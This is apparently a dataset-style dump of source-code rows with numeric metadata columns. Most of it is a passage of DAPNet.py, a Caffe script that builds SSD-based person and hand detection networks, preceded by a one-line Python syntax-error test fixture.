assert [3, 1, 3, 1, 1] == list(map_attr(chunks, 'len'))
| 43.626667
| 88
| 0.558985
| 576
| 3,272
| 3.043403
| 0.071181
| 0.123788
| 0.188249
| 0.29093
| 0.922989
| 0.917285
| 0.916144
| 0.916144
| 0.913862
| 0.912721
| 0
| 0.097061
| 0.209658
| 3,272
| 74
| 89
| 44.216216
| 0.58082
| 0
| 0
| 0.65
| 0
| 0
| 0.043704
| 0
| 0
| 0
| 0
| 0
| 0.616667
| 1
| 0.116667
| false
| 0
| 0.033333
| 0
| 0.15
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
c57465cb41977609d27640e14ff0d557ccb9c28e
| 7
|
py
|
Python
|
tests/syntax/integer_with_leading_zero_1.py
|
matan-h/friendly
|
3ab0fc6541c837271e8865e247750007acdd18fb
|
[
"MIT"
] | 287
|
2019-04-08T13:18:29.000Z
|
2021-03-14T19:10:21.000Z
|
tests/syntax/integer_with_leading_zero_1.py
|
matan-h/friendly
|
3ab0fc6541c837271e8865e247750007acdd18fb
|
[
"MIT"
] | 191
|
2019-04-08T14:39:18.000Z
|
2021-03-14T22:14:56.000Z
|
tests/syntax/integer_with_leading_zero_1.py
|
matan-h/friendly
|
3ab0fc6541c837271e8865e247750007acdd18fb
|
[
"MIT"
] | 9
|
2019-04-08T12:54:08.000Z
|
2020-11-20T02:26:27.000Z
|
x = 01
| 3.5
| 6
| 0.428571
| 2
| 7
| 1.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.5
| 0.428571
| 7
| 1
| 7
| 7
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3d64bf307b2568150287b72163728212b60311b3
| 68,097
|
py
|
Python
|
remodet_repository_wdh_part/Projects/zhangming@172.16.168/DAPNet.py
|
UrwLee/Remo_experience
|
a59d5b9d6d009524672e415c77d056bc9dd88c72
|
[
"MIT"
] | null | null | null |
remodet_repository_wdh_part/Projects/zhangming@172.16.168/DAPNet.py
|
UrwLee/Remo_experience
|
a59d5b9d6d009524672e415c77d056bc9dd88c72
|
[
"MIT"
] | null | null | null |
remodet_repository_wdh_part/Projects/zhangming@172.16.168/DAPNet.py
|
UrwLee/Remo_experience
|
a59d5b9d6d009524672e415c77d056bc9dd88c72
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
import sys
import math
sys.dont_write_bytecode = True
import caffe
from caffe import layers as L
from caffe import params as P
from caffe.proto import caffe_pb2
sys.path.append('../')
from PyLib.LayerParam.MultiBoxLossLayerParam import *
from PyLib.NetLib.ConvBNLayer import *
from PyLib.NetLib.InceptionLayer import *
from PyLib.NetLib.MultiScaleLayer import *
from PyLib.NetLib.VggNet import VGG16_BaseNet_ChangeChannel
from PyLib.NetLib.YoloNet import YoloNetPart
from BaseNet import *
from AddC6 import *
from DetectorHeader import *
from DAP_Param import *
import numpy as np
from solverParam import truncvalues
# ##############################################################################
# ------------------------------------------------------------------------------
# Final Network
flag_train_withperson = True
flag_train_withhand = False
def Deconv(net,from_layer,num_output,group,kernel_size,stride,lr_mult,decay_mult,use_bn,use_scale,use_relu):
deconv_param = {
'num_output': num_output,
'kernel_size': kernel_size,
'pad': 0,
'stride': stride,
'weight_filler': dict(type='gaussian', std=0.01),
'bias_term': False,
'group': group,
}
kwargs_deconv = {
'param': [dict(lr_mult=lr_mult, decay_mult=decay_mult)],
'convolution_param': deconv_param
}
out_layer = from_layer + "_deconv"
net[out_layer] = L.Deconvolution(net[from_layer], **kwargs_deconv)
base_conv_name = out_layer
from_layer = out_layer
# parameters for batchnorm layer.
bn_kwargs = {
'param': [dict(lr_mult=0, decay_mult=0), dict(lr_mult=0, decay_mult=0), dict(lr_mult=0, decay_mult=0)],
'eps': 0.001,
}
sb_kwargs = {
'bias_term': True,
'param': [dict(lr_mult=lr_mult, decay_mult=0), dict(lr_mult=lr_mult, decay_mult=0)],
'filler': dict(type='constant', value=1.0),
'bias_filler': dict(type='constant', value=0.2),
}
if use_bn:
bn_name = '{}_bn'.format(base_conv_name)
net[bn_name] = L.BatchNorm(net[from_layer], in_place=True, **bn_kwargs)
from_layer = bn_name
if use_scale:
sb_name = '{}_scale'.format(base_conv_name)
net[sb_name] = L.Scale(net[from_layer], in_place=True, **sb_kwargs)
from_layer = sb_name
if use_relu:
relu_name = '{}_relu'.format(base_conv_name)
net[relu_name] = L.ReLU(net[from_layer], in_place=True)
def DAPNet(net, train=True, data_layer="data", gt_label="label", \
net_width=512, net_height=288):
lr_basenet = 1.0
# BaseNet
use_sub_layers = (6, 7)
num_channels = (144, 288)
output_channels = (128, 0)
channel_scale = 4
add_strs = "_recon"
net = ResidualVariant_Base_A(net, data_layer=data_layer, use_sub_layers=use_sub_layers, num_channels=num_channels,
output_channels=output_channels,channel_scale=channel_scale,lr=lr_basenet, decay=1, add_strs=add_strs,)
if flag_train_withhand:
use_bn = True
from_layer = "pool1_recon"
out_layer = 'conv2_hand'
ConvBNUnitLayer(net, from_layer, out_layer, use_bn=use_bn, use_relu=True,
num_output=32, kernel_size=3, pad=1, stride=1, use_scale=True, leaky=False, lr_mult=1,
decay_mult=1)
from_layer = "conv2_4_recon_relu"
Deconv(net, from_layer, num_output=64, group=1, kernel_size=2, stride=2, lr_mult=1.0, decay_mult=1.0,
use_bn=True, use_scale=True,use_relu=True)
feature_layers = []
feature_layers.append(net["conv2_hand"])
feature_layers.append(net["conv2_4_recon_relu_deconv"])
add_layer = "featuremap0"
net[add_layer] = L.Concat(*feature_layers, axis=1)
lr_detnetperson = 1.0
# Add Conv6
conv6_output = Conv6_Param.get('conv6_output',[])
conv6_kernal_size = Conv6_Param.get('conv6_kernal_size',[])
out_layer = "conv3_7_recon_relu"
net = addconv6(net, from_layer=out_layer, use_bn=True, conv6_output=conv6_output, \
conv6_kernal_size=conv6_kernal_size, pre_name="conv6",start_pool=True,lr_mult=lr_detnetperson, decay_mult=1,n_group=1)
# Concat FM1 & FM2 & FM3 for Detection
featuremap1 = ["pool1_recon","conv2_6_recon_relu"]
tags = ["Down","Ref"]
down_methods = [["MaxPool"]]
out_layer = "featuremap1"
UnifiedMultiScaleLayers(net,layers=featuremap1, tags=tags, unifiedlayer=out_layer, dnsampleMethod=down_methods)
# Concat FM2
featuremap2 = ["conv2_6_recon_relu","conv3_7_recon_relu"]
tags = ["Down","Ref"]
down_methods = [["MaxPool"]]
out_layer = "featuremap2"
UnifiedMultiScaleLayers(net,layers=featuremap2, tags=tags, unifiedlayer=out_layer, dnsampleMethod=down_methods)
# Concat FM3
c6_layer = 'conv6_{}'.format(len(Conv6_Param['conv6_output']))
featuremap3 = ["conv3_7_recon_relu",c6_layer]
tags = ["Down","Ref"]
down_methods = [["MaxPool"]]
out_layer = "featuremap3"
UnifiedMultiScaleLayers(net,layers=featuremap3, tags=tags, unifiedlayer=out_layer, dnsampleMethod=down_methods)
# Create SSD Header for SSD1
if flag_train_withperson:
mbox_1_layers = SsdDetectorHeaders(net, \
net_width=net_width, net_height=net_height, data_layer=data_layer, \
from_layers=ssd_Param_1.get('feature_layers',[]), \
num_classes=ssd_Param_1.get("num_classes",2), \
boxsizes=ssd_Param_1.get("anchor_boxsizes", []), \
aspect_ratios=ssd_Param_1.get("anchor_aspect_ratios",[]), \
prior_variance = ssd_Param_1.get("anchor_prior_variance",[0.1,0.1,0.2,0.2]), \
flip=ssd_Param_1.get("anchor_flip",True), \
clip=ssd_Param_1.get("anchor_clip",True), \
normalizations=ssd_Param_1.get("interlayers_normalizations",[]), \
use_batchnorm=ssd_Param_1.get("interlayers_use_batchnorm",True), \
inter_layer_channels=ssd_Param_1.get("interlayers_channels_kernels",[]), \
use_focus_loss=ssd_Param_1.get("bboxloss_using_focus_loss",False), \
use_dense_boxes=ssd_Param_1.get('bboxloss_use_dense_boxes',False), \
stage=1,lr_mult=lr_detnetperson)
# make Loss or Detout for SSD1
if train:
loss_param = get_loss_param(normalization=ssd_Param_1.get("bboxloss_normalization",P.Loss.VALID))
mbox_1_layers.append(net[gt_label])
use_dense_boxes = ssd_Param_1.get('bboxloss_use_dense_boxes',False)
if use_dense_boxes:
bboxloss_param = {
'gt_labels': ssd_Param_1.get('gt_labels',[]),
'target_labels': ssd_Param_1.get('target_labels',[]),
'num_classes':ssd_Param_1.get("num_classes",2),
'alias_id':ssd_Param_1.get("alias_id",0),
'loc_loss_type':ssd_Param_1.get("bboxloss_loc_loss_type",P.MultiBoxLoss.SMOOTH_L1),
'conf_loss_type':ssd_Param_1.get("bboxloss_conf_loss_type",P.MultiBoxLoss.LOGISTIC),
'loc_weight':ssd_Param_1.get("bboxloss_loc_weight",1),
'conf_weight':ssd_Param_1.get("bboxloss_conf_weight",1),
'overlap_threshold':ssd_Param_1.get("bboxloss_overlap_threshold",0.5),
'neg_overlap':ssd_Param_1.get("bboxloss_neg_overlap",0.5),
'size_threshold':ssd_Param_1.get("bboxloss_size_threshold",0.0001),
'do_neg_mining':ssd_Param_1.get("bboxloss_do_neg_mining",True),
'neg_pos_ratio':ssd_Param_1.get("bboxloss_neg_pos_ratio",3),
'using_focus_loss':ssd_Param_1.get("bboxloss_using_focus_loss",False),
'gama':ssd_Param_1.get("bboxloss_focus_gama",2),
'use_difficult_gt':ssd_Param_1.get("bboxloss_use_difficult_gt",False),
'code_type':ssd_Param_1.get("bboxloss_code_type",P.PriorBox.CENTER_SIZE),
'use_prior_for_matching':True,
'encode_variance_in_target': False,
'flag_noperson':ssd_Param_1.get('flag_noperson',False),
}
net["mbox_1_loss"] = L.DenseBBoxLoss(*mbox_1_layers, dense_bbox_loss_param=bboxloss_param, \
loss_param=loss_param, include=dict(phase=caffe_pb2.Phase.Value('TRAIN')), \
propagate_down=[True, True, False, False])
else:
bboxloss_param = {
'gt_labels': ssd_Param_1.get('gt_labels',[]),
'target_labels': ssd_Param_1.get('target_labels',[]),
'num_classes':ssd_Param_1.get("num_classes",2),
'alias_id':ssd_Param_1.get("alias_id",0),
'loc_loss_type':ssd_Param_1.get("bboxloss_loc_loss_type",P.MultiBoxLoss.SMOOTH_L1),
'conf_loss_type':ssd_Param_1.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX),
'loc_weight':ssd_Param_1.get("bboxloss_loc_weight",1),
'conf_weight':ssd_Param_1.get("bboxloss_conf_weight",1),
'overlap_threshold':ssd_Param_1.get("bboxloss_overlap_threshold",0.5),
'neg_overlap':ssd_Param_1.get("bboxloss_neg_overlap",0.5),
'size_threshold':ssd_Param_1.get("bboxloss_size_threshold",0.0001),
'do_neg_mining':ssd_Param_1.get("bboxloss_do_neg_mining",True),
'neg_pos_ratio':ssd_Param_1.get("bboxloss_neg_pos_ratio",3),
'using_focus_loss':ssd_Param_1.get("bboxloss_using_focus_loss",False),
'gama':ssd_Param_1.get("bboxloss_focus_gama",2),
'use_difficult_gt':ssd_Param_1.get("bboxloss_use_difficult_gt",False),
'code_type':ssd_Param_1.get("bboxloss_code_type",P.PriorBox.CENTER_SIZE),
'match_type':P.MultiBoxLoss.PER_PREDICTION,
'share_location':True,
'use_prior_for_matching':True,
'background_label_id':0,
'encode_variance_in_target': False,
'map_object_to_agnostic':False,
}
net["mbox_1_loss"] = L.BBoxLoss(*mbox_1_layers, bbox_loss_param=bboxloss_param, \
loss_param=loss_param,include=dict(phase=caffe_pb2.Phase.Value('TRAIN')), \
propagate_down=[True, True, False, False])
else:
if ssd_Param_1.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX) == P.MultiBoxLoss.SOFTMAX:
reshape_name = "mbox_1_conf_reshape"
net[reshape_name] = L.Reshape(mbox_1_layers[1], \
shape=dict(dim=[0, -1, ssd_Param_1.get("num_classes",2)]))
softmax_name = "mbox_1_conf_softmax"
net[softmax_name] = L.Softmax(net[reshape_name], axis=2)
flatten_name = "mbox_1_conf_flatten"
net[flatten_name] = L.Flatten(net[softmax_name], axis=1)
mbox_1_layers[1] = net[flatten_name]
elif ssd_Param_1.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX) == P.MultiBoxLoss.LOGISTIC:
sigmoid_name = "mbox_1_conf_sigmoid"
net[sigmoid_name] = L.Sigmoid(mbox_1_layers[1])
mbox_1_layers[1] = net[sigmoid_name]
else:
raise ValueError("Unknown conf loss type.")
# Det-out param
det_out_param = {
'num_classes':ssd_Param_1.get("num_classes",2),
'target_labels': ssd_Param_1.get('detout_target_labels',[]),
'alias_id':ssd_Param_1.get("alias_id",0),
'conf_threshold':ssd_Param_1.get("detout_conf_threshold",0.01),
'nms_threshold':ssd_Param_1.get("detout_nms_threshold",0.45),
'size_threshold':ssd_Param_1.get("detout_size_threshold",0.0001),
'top_k':ssd_Param_1.get("detout_top_k",30),
'share_location':True,
'code_type':P.PriorBox.CENTER_SIZE,
'background_label_id':0,
'variance_encoded_in_target':False,
}
use_dense_boxes = ssd_Param_1.get('bboxloss_use_dense_boxes',False)
if use_dense_boxes:
net.detection_out_1 = L.DenseDetOut(*mbox_1_layers, \
detection_output_param=det_out_param, \
include=dict(phase=caffe_pb2.Phase.Value('TEST')))
else:
net.detection_out_1 = L.DetOut(*mbox_1_layers, \
detection_output_param=det_out_param, \
include=dict(phase=caffe_pb2.Phase.Value('TEST')))
# make Loss & Detout for SSD2
if use_ssd2_for_detection:
mbox_2_layers = SsdDetectorHeaders(net, \
net_width=net_width, net_height=net_height, data_layer=data_layer, \
from_layers=ssd_Param_2.get('feature_layers',[]), \
num_classes=ssd_Param_2.get("num_classes",2), \
boxsizes=ssd_Param_2.get("anchor_boxsizes", []), \
aspect_ratios=ssd_Param_2.get("anchor_aspect_ratios",[]), \
prior_variance = ssd_Param_2.get("anchor_prior_variance",[0.1,0.1,0.2,0.2]), \
flip=ssd_Param_2.get("anchor_flip",True), \
clip=ssd_Param_2.get("anchor_clip",True), \
normalizations=ssd_Param_2.get("interlayers_normalizations",[]), \
use_batchnorm=ssd_Param_2.get("interlayers_use_batchnorm",True), \
inter_layer_channels=ssd_Param_2.get("interlayers_channels_kernels",[]), \
use_focus_loss=ssd_Param_2.get("bboxloss_using_focus_loss",False), \
use_dense_boxes=ssd_Param_2.get('bboxloss_use_dense_boxes',False), \
stage=2)
# make Loss or Detout for SSD1
if train:
loss_param = get_loss_param(normalization=ssd_Param_2.get("bboxloss_normalization",P.Loss.VALID))
mbox_2_layers.append(net[gt_label])
use_dense_boxes = ssd_Param_2.get('bboxloss_use_dense_boxes',False)
if use_dense_boxes:
bboxloss_param = {
'gt_labels': ssd_Param_2.get('gt_labels',[]),
'target_labels': ssd_Param_2.get('target_labels',[]),
'num_classes':ssd_Param_2.get("num_classes",2),
'alias_id':ssd_Param_2.get("alias_id",0),
'loc_loss_type':ssd_Param_2.get("bboxloss_loc_loss_type",P.MultiBoxLoss.SMOOTH_L1),
'conf_loss_type':ssd_Param_2.get("bboxloss_conf_loss_type",P.MultiBoxLoss.LOGISTIC),
'loc_weight':ssd_Param_2.get("bboxloss_loc_weight",1),
'conf_weight':ssd_Param_2.get("bboxloss_conf_weight",1),
'overlap_threshold':ssd_Param_2.get("bboxloss_overlap_threshold",0.5),
'neg_overlap':ssd_Param_2.get("bboxloss_neg_overlap",0.5),
'size_threshold':ssd_Param_2.get("bboxloss_size_threshold",0.0001),
'do_neg_mining':ssd_Param_2.get("bboxloss_do_neg_mining",True),
'neg_pos_ratio':ssd_Param_2.get("bboxloss_neg_pos_ratio",3),
'using_focus_loss':ssd_Param_2.get("bboxloss_using_focus_loss",False),
'gama':ssd_Param_2.get("bboxloss_focus_gama",2),
'use_difficult_gt':ssd_Param_2.get("bboxloss_use_difficult_gt",False),
'code_type':ssd_Param_2.get("bboxloss_code_type",P.PriorBox.CENTER_SIZE),
'use_prior_for_matching':True,
'encode_variance_in_target': False,
'flag_noperson': ssd_Param_2.get('flag_noperson', False),
}
net["mbox_2_loss"] = L.DenseBBoxLoss(*mbox_2_layers, dense_bbox_loss_param=bboxloss_param, \
loss_param=loss_param, include=dict(phase=caffe_pb2.Phase.Value('TRAIN')), \
propagate_down=[True, True, False, False])
else:
bboxloss_param = {
'gt_labels': ssd_Param_2.get('gt_labels',[]),
'target_labels': ssd_Param_2.get('target_labels',[]),
'num_classes':ssd_Param_2.get("num_classes",2),
'alias_id':ssd_Param_2.get("alias_id",0),
'loc_loss_type':ssd_Param_2.get("bboxloss_loc_loss_type",P.MultiBoxLoss.SMOOTH_L1),
'conf_loss_type':ssd_Param_2.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX),
'loc_weight':ssd_Param_2.get("bboxloss_loc_weight",1),
'conf_weight':ssd_Param_2.get("bboxloss_conf_weight",1),
'overlap_threshold':ssd_Param_2.get("bboxloss_overlap_threshold",0.5),
'neg_overlap':ssd_Param_2.get("bboxloss_neg_overlap",0.5),
'size_threshold':ssd_Param_2.get("bboxloss_size_threshold",0.0001),
'do_neg_mining':ssd_Param_2.get("bboxloss_do_neg_mining",True),
'neg_pos_ratio':ssd_Param_2.get("bboxloss_neg_pos_ratio",3),
'using_focus_loss':ssd_Param_2.get("bboxloss_using_focus_loss",False),
'gama':ssd_Param_2.get("bboxloss_focus_gama",2),
'use_difficult_gt':ssd_Param_2.get("bboxloss_use_difficult_gt",False),
'code_type':ssd_Param_2.get("bboxloss_code_type",P.PriorBox.CENTER_SIZE),
'match_type':P.MultiBoxLoss.PER_PREDICTION,
'share_location':True,
'use_prior_for_matching':True,
'background_label_id':0,
'encode_variance_in_target': False,
'map_object_to_agnostic':False,
}
net["mbox_2_loss"] = L.BBoxLoss(*mbox_2_layers, bbox_loss_param=bboxloss_param, \
loss_param=loss_param,include=dict(phase=caffe_pb2.Phase.Value('TRAIN')), \
propagate_down=[True, True, False, False])
else:
if ssd_Param_2.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX) == P.MultiBoxLoss.SOFTMAX:
reshape_name = "mbox_2_conf_reshape"
net[reshape_name] = L.Reshape(mbox_2_layers[1], \
shape=dict(dim=[0, -1, ssd_Param_2.get("num_classes",2)]))
softmax_name = "mbox_2_conf_softmax"
net[softmax_name] = L.Softmax(net[reshape_name], axis=2)
flatten_name = "mbox_2_conf_flatten"
net[flatten_name] = L.Flatten(net[softmax_name], axis=1)
mbox_2_layers[1] = net[flatten_name]
elif ssd_Param_2.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX) == P.MultiBoxLoss.LOGISTIC:
sigmoid_name = "mbox_2_conf_sigmoid"
net[sigmoid_name] = L.Sigmoid(mbox_2_layers[1])
mbox_2_layers[1] = net[sigmoid_name]
else:
raise ValueError("Unknown conf loss type.")
# Det-out param
det_out_param = {
'num_classes':ssd_Param_2.get("num_classes",2),
'target_labels': ssd_Param_2.get('detout_target_labels',[]),
'alias_id':ssd_Param_2.get("alias_id",0),
'conf_threshold':ssd_Param_2.get("detout_conf_threshold",0.01),
'nms_threshold':ssd_Param_2.get("detout_nms_threshold",0.45),
'size_threshold':ssd_Param_2.get("detout_size_threshold",0.0001),
'top_k':ssd_Param_2.get("detout_top_k",30),
'share_location':True,
'code_type':P.PriorBox.CENTER_SIZE,
'background_label_id':0,
'variance_encoded_in_target':False,
}
use_dense_boxes = ssd_Param_2.get('bboxloss_use_dense_boxes',False)
if use_dense_boxes:
net.detection_out_2 = L.DenseDetOut(*mbox_2_layers, \
detection_output_param=det_out_param, \
include=dict(phase=caffe_pb2.Phase.Value('TEST')))
else:
net.detection_out_2 = L.DetOut(*mbox_2_layers, \
detection_output_param=det_out_param, \
include=dict(phase=caffe_pb2.Phase.Value('TEST')))
# EVAL in TEST MODE
if not train:
det_eval_param = {
'gt_labels': eval_Param.get('eval_gt_labels',[]),
'num_classes':eval_Param.get("eval_num_classes",2),
'evaluate_difficult_gt':eval_Param.get("eval_difficult_gt",False),
'boxsize_threshold':eval_Param.get("eval_boxsize_threshold",[0,0.01,0.05,0.1,0.15,0.2,0.25]),
'iou_threshold':eval_Param.get("eval_iou_threshold",[0.9,0.75,0.5]),
'background_label_id':0,
}
if use_ssd2_for_detection:
det_out_layers = []
if flag_train_withperson:
det_out_layers.append(net['detection_out_1'])
det_out_layers.append(net['detection_out_2'])
name = 'det_out'
net[name] = L.Concat(*det_out_layers, axis=2)
net.det_accu = L.DetEval(net[name], net[gt_label], \
detection_evaluate_param=det_eval_param, \
include=dict(phase=caffe_pb2.Phase.Value('TEST')))
else:
net.det_accu = L.DetEval(net['detection_out_1'], net[gt_label], \
detection_evaluate_param=det_eval_param, \
include=dict(phase=caffe_pb2.Phase.Value('TEST')))
return net
def DAPNetVGGReduce(net, train=True, data_layer="data", gt_label="label", \
net_width=512, net_height=288):
# BaseNet
flag_use_dark = False
if flag_use_dark:
net = YoloNetPart(net, from_layer="data", use_bn=True, use_layers=5, use_sub_layers=5, final_pool=True, lr=1,
decay=1)#1.47G, 13.7M
else:
# c = ((32,), (32,), (32, 32, 128), (64, 64, 128), (128, 128, 256))#1.74G, 19.43M
# net = VGG16_BaseNet_ChangeChannel(net, "data", channels=c)
channels = ((32,), (32,), (64, 32, 128), (128, 64, 128, 64, 256), (256, 128, 256, 128, 256))
strides = (True, True, True, False, False)
kernels = ((3,), (3,), (3, 1, 3), (3, 1, 3, 1, 3), (3, 1, 3, 1, 3))
pool_last = (False,False,False,True,True)
net = VGG16_BaseNet_ChangeChannel(net, from_layer=data_layer, channels=channels, strides=strides,
kernels=kernels,freeze_layers=[], pool_last=pool_last)
lr_detnetperson = 1.0
# Add Conv6
conv6_output = Conv6_Param.get('conv6_output',[])
conv6_kernal_size = Conv6_Param.get('conv6_kernal_size',[])
out_layer = "pool5"
net = addconv6(net, from_layer=out_layer, use_bn=True, conv6_output=conv6_output, \
conv6_kernal_size=conv6_kernal_size, pre_name="conv6",start_pool=False,lr_mult=lr_detnetperson, decay_mult=1,n_group=1)
# Concat FM1 & FM2 & FM3 for Detection
featuremap1 = ["pool2","pool3"]
tags = ["Down","Ref"]
down_methods = [["MaxPool"]]
out_layer = "featuremap1"
UnifiedMultiScaleLayers(net,layers=featuremap1, tags=tags, unifiedlayer=out_layer, dnsampleMethod=down_methods)
# Concat FM2
featuremap2 = ["pool3","pool4"]
tags = ["Down","Ref"]
down_methods = [["MaxPool"]]
out_layer = "featuremap2"
UnifiedMultiScaleLayers(net,layers=featuremap2, tags=tags, unifiedlayer=out_layer, dnsampleMethod=down_methods)
# Concat FM3
c6_layer = 'conv6_{}'.format(len(Conv6_Param['conv6_output']))
featuremap3 = ["pool5",c6_layer]
tags = ["Ref","Ref"]
down_methods = [["MaxPool"]]
out_layer = "featuremap3"
UnifiedMultiScaleLayers(net,layers=featuremap3, tags=tags, unifiedlayer=out_layer, dnsampleMethod=down_methods)
# Create SSD Header for SSD1
if flag_train_withperson:
mbox_1_layers = SsdDetectorHeaders(net, \
net_width=net_width, net_height=net_height, data_layer=data_layer, \
from_layers=ssd_Param_1.get('feature_layers',[]), \
num_classes=ssd_Param_1.get("num_classes",2), \
boxsizes=ssd_Param_1.get("anchor_boxsizes", []), \
aspect_ratios=ssd_Param_1.get("anchor_aspect_ratios",[]), \
prior_variance = ssd_Param_1.get("anchor_prior_variance",[0.1,0.1,0.2,0.2]), \
flip=ssd_Param_1.get("anchor_flip",True), \
clip=ssd_Param_1.get("anchor_clip",True), \
normalizations=ssd_Param_1.get("interlayers_normalizations",[]), \
use_batchnorm=ssd_Param_1.get("interlayers_use_batchnorm",True), \
inter_layer_channels=ssd_Param_1.get("interlayers_channels_kernels",[]), \
use_focus_loss=ssd_Param_1.get("bboxloss_using_focus_loss",False), \
use_dense_boxes=ssd_Param_1.get('bboxloss_use_dense_boxes',False), \
stage=1,lr_mult=lr_detnetperson)
# make Loss or Detout for SSD1
if train:
loss_param = get_loss_param(normalization=ssd_Param_1.get("bboxloss_normalization",P.Loss.VALID))
mbox_1_layers.append(net[gt_label])
use_dense_boxes = ssd_Param_1.get('bboxloss_use_dense_boxes',False)
if use_dense_boxes:
bboxloss_param = {
'gt_labels': ssd_Param_1.get('gt_labels',[]),
'target_labels': ssd_Param_1.get('target_labels',[]),
'num_classes':ssd_Param_1.get("num_classes",2),
'alias_id':ssd_Param_1.get("alias_id",0),
'loc_loss_type':ssd_Param_1.get("bboxloss_loc_loss_type",P.MultiBoxLoss.SMOOTH_L1),
'conf_loss_type':ssd_Param_1.get("bboxloss_conf_loss_type",P.MultiBoxLoss.LOGISTIC),
'loc_weight':ssd_Param_1.get("bboxloss_loc_weight",1),
'conf_weight':ssd_Param_1.get("bboxloss_conf_weight",1),
'overlap_threshold':ssd_Param_1.get("bboxloss_overlap_threshold",0.5),
'neg_overlap':ssd_Param_1.get("bboxloss_neg_overlap",0.5),
'size_threshold':ssd_Param_1.get("bboxloss_size_threshold",0.0001),
'do_neg_mining':ssd_Param_1.get("bboxloss_do_neg_mining",True),
'neg_pos_ratio':ssd_Param_1.get("bboxloss_neg_pos_ratio",3),
'using_focus_loss':ssd_Param_1.get("bboxloss_using_focus_loss",False),
'gama':ssd_Param_1.get("bboxloss_focus_gama",2),
'use_difficult_gt':ssd_Param_1.get("bboxloss_use_difficult_gt",False),
'code_type':ssd_Param_1.get("bboxloss_code_type",P.PriorBox.CENTER_SIZE),
'use_prior_for_matching':True,
'encode_variance_in_target': False,
'flag_noperson':ssd_Param_1.get('flag_noperson',False),
}
net["mbox_1_loss"] = L.DenseBBoxLoss(*mbox_1_layers, dense_bbox_loss_param=bboxloss_param, \
loss_param=loss_param, include=dict(phase=caffe_pb2.Phase.Value('TRAIN')), \
propagate_down=[True, True, False, False])
else:
bboxloss_param = {
'gt_labels': ssd_Param_1.get('gt_labels',[]),
'target_labels': ssd_Param_1.get('target_labels',[]),
'num_classes':ssd_Param_1.get("num_classes",2),
'alias_id':ssd_Param_1.get("alias_id",0),
'loc_loss_type':ssd_Param_1.get("bboxloss_loc_loss_type",P.MultiBoxLoss.SMOOTH_L1),
'conf_loss_type':ssd_Param_1.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX),
'loc_weight':ssd_Param_1.get("bboxloss_loc_weight",1),
'conf_weight':ssd_Param_1.get("bboxloss_conf_weight",1),
'overlap_threshold':ssd_Param_1.get("bboxloss_overlap_threshold",0.5),
'neg_overlap':ssd_Param_1.get("bboxloss_neg_overlap",0.5),
'size_threshold':ssd_Param_1.get("bboxloss_size_threshold",0.0001),
'do_neg_mining':ssd_Param_1.get("bboxloss_do_neg_mining",True),
'neg_pos_ratio':ssd_Param_1.get("bboxloss_neg_pos_ratio",3),
'using_focus_loss':ssd_Param_1.get("bboxloss_using_focus_loss",False),
'gama':ssd_Param_1.get("bboxloss_focus_gama",2),
'use_difficult_gt':ssd_Param_1.get("bboxloss_use_difficult_gt",False),
'code_type':ssd_Param_1.get("bboxloss_code_type",P.PriorBox.CENTER_SIZE),
'match_type':P.MultiBoxLoss.PER_PREDICTION,
'share_location':True,
'use_prior_for_matching':True,
'background_label_id':0,
'encode_variance_in_target': False,
'map_object_to_agnostic':False,
}
net["mbox_1_loss"] = L.BBoxLoss(*mbox_1_layers, bbox_loss_param=bboxloss_param, \
loss_param=loss_param,include=dict(phase=caffe_pb2.Phase.Value('TRAIN')), \
propagate_down=[True, True, False, False])
else:
if ssd_Param_1.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX) == P.MultiBoxLoss.SOFTMAX:
reshape_name = "mbox_1_conf_reshape"
net[reshape_name] = L.Reshape(mbox_1_layers[1], \
shape=dict(dim=[0, -1, ssd_Param_1.get("num_classes",2)]))
softmax_name = "mbox_1_conf_softmax"
net[softmax_name] = L.Softmax(net[reshape_name], axis=2)
flatten_name = "mbox_1_conf_flatten"
net[flatten_name] = L.Flatten(net[softmax_name], axis=1)
mbox_1_layers[1] = net[flatten_name]
elif ssd_Param_1.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX) == P.MultiBoxLoss.LOGISTIC:
sigmoid_name = "mbox_1_conf_sigmoid"
net[sigmoid_name] = L.Sigmoid(mbox_1_layers[1])
mbox_1_layers[1] = net[sigmoid_name]
else:
raise ValueError("Unknown conf loss type.")
# Det-out param
det_out_param = {
'num_classes':ssd_Param_1.get("num_classes",2),
'target_labels': ssd_Param_1.get('detout_target_labels',[]),
'alias_id':ssd_Param_1.get("alias_id",0),
'conf_threshold':ssd_Param_1.get("detout_conf_threshold",0.01),
'nms_threshold':ssd_Param_1.get("detout_nms_threshold",0.45),
'size_threshold':ssd_Param_1.get("detout_size_threshold",0.0001),
'top_k':ssd_Param_1.get("detout_top_k",30),
'share_location':True,
'code_type':P.PriorBox.CENTER_SIZE,
'background_label_id':0,
'variance_encoded_in_target':False,
}
use_dense_boxes = ssd_Param_1.get('bboxloss_use_dense_boxes',False)
if use_dense_boxes:
net.detection_out_1 = L.DenseDetOut(*mbox_1_layers, \
detection_output_param=det_out_param, \
include=dict(phase=caffe_pb2.Phase.Value('TEST')))
else:
net.detection_out_1 = L.DetOut(*mbox_1_layers, \
detection_output_param=det_out_param, \
